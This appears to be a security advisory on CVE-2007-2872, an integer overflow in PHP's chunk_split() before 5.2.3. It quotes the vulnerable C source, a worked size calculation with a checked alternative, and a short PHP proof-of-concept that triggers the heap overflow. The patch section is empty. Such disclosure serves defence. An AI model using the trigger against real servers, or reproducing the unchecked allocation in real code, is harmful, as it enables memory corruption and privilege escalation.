
Analysis of the chunk_split() Integer Overflow Vulnerability in PHP 5.2

Affected systems:
PHP PHP < 5.2.3
Unaffected systems:
PHP PHP 5.2.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872

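PHP is a popular server-side web programming language.

The chunk_split function in PHP has an integer overflow vulnerability when it handles malformed arguments; a local attacker may exploit it to elevate privileges.

Line 1963 of the chunk_split function tries to allocate enough memory for the function result, but it uses the srclen and chunklen parameters without performing any checks. If the number of chunks and endlen are greater than 65534 bytes, an integer overflow is triggered, the wrong amount of memory is allocated, and a heap overflow follows.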

ext/standard/string.c:

1953 static char *php_chunk_split(char *src, int srclen, char *end,
                                  int endlen, int chunklen, int *destlen)
1954 {
1955     char *dest;
1956     char *p, *q;
1957     int chunks; /* complete chunks! */
1958     int restlen;
1959
1960     chunks = srclen / chunklen;
1961     restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963     dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
                             sizeof(char), 0);
1964
1965     for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966         memcpy(q, p, chunklen);
1967         q += chunklen;
1968         memcpy(q, end, endlen);
1969         q += endlen;
1970         p += chunklen;
1971     }
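The size arithmetic on line 1963, worked through as an added example (not code from PHP or from the original advisory): it compares the size the expression should produce with the value left after 32-bit wraparound, and shows one way to reject such input before allocating. The helper names needed_size, wrapped_size and checked_size are hypothetical, and checked_size is an illustration, not the vendor's patch.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Size the expression on line 1963 is meant to produce, in 64-bit math. */
static int64_t needed_size(int srclen, int endlen, int chunklen)
{
    int64_t chunks = srclen / chunklen;
    return (int64_t)srclen + (chunks + 1) * (int64_t)endlen + 1;
}

/* The same value reduced modulo 2^32: what 32-bit int arithmetic yields
 * in practice on two's-complement targets when the expression wraps. */
static uint32_t wrapped_size(int srclen, int endlen, int chunklen)
{
    return (uint32_t)needed_size(srclen, endlen, chunklen);
}

/* Hypothetical hardened helper: stores the size in *out and returns 0,
 * or returns -1 when an input is invalid or the size does not fit in int. */
static int checked_size(int srclen, int endlen, int chunklen, int *out)
{
    int chunks, n, total;
    if (srclen < 0 || endlen < 0 || chunklen <= 0)
        return -1;
    chunks = srclen / chunklen;
    if (chunks > INT_MAX - 1)                   /* guards chunks + 1 */
        return -1;
    n = chunks + 1;
    if (endlen != 0 && n > INT_MAX / endlen)    /* guards n * endlen */
        return -1;
    total = n * endlen;
    if (total > INT_MAX - srclen - 1)           /* guards total + srclen + 1 */
        return -1;
    *out = total + srclen + 1;
    return 0;
}

int main(void)
{
    int size = 0;
    /* Lengths taken from the test case on this page. */
    int rc = checked_size(65535, 65535, 1, &size);
    printf("needed=%lld wrapped=%u checked_rc=%d\n",
           (long long)needed_size(65535, 65535, 1),
           (unsigned)wrapped_size(65535, 65535, 1), rc);
    return 0;
}
```

With the lengths from the page's test case the required size is exactly 2^32 bytes, which wraps to 0, so the copy loop at lines 1965-1971 writes into a buffer far smaller than it needs.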

<*Source: Gerhard Wagner

*>

Test method:
--------------------------------------------------------------------------------

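Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!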

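<?php
// Source string of 65535 bytes.
$a = str_repeat("A", 65535);
// Chunk length of 1, so the source splits into 65535 chunks.
$b = 1;
// Line-ending string of 65535 bytes, appended after every chunk.
$c = str_repeat("A", 65535);
chunk_split($a, $b, $c);
?>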

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---

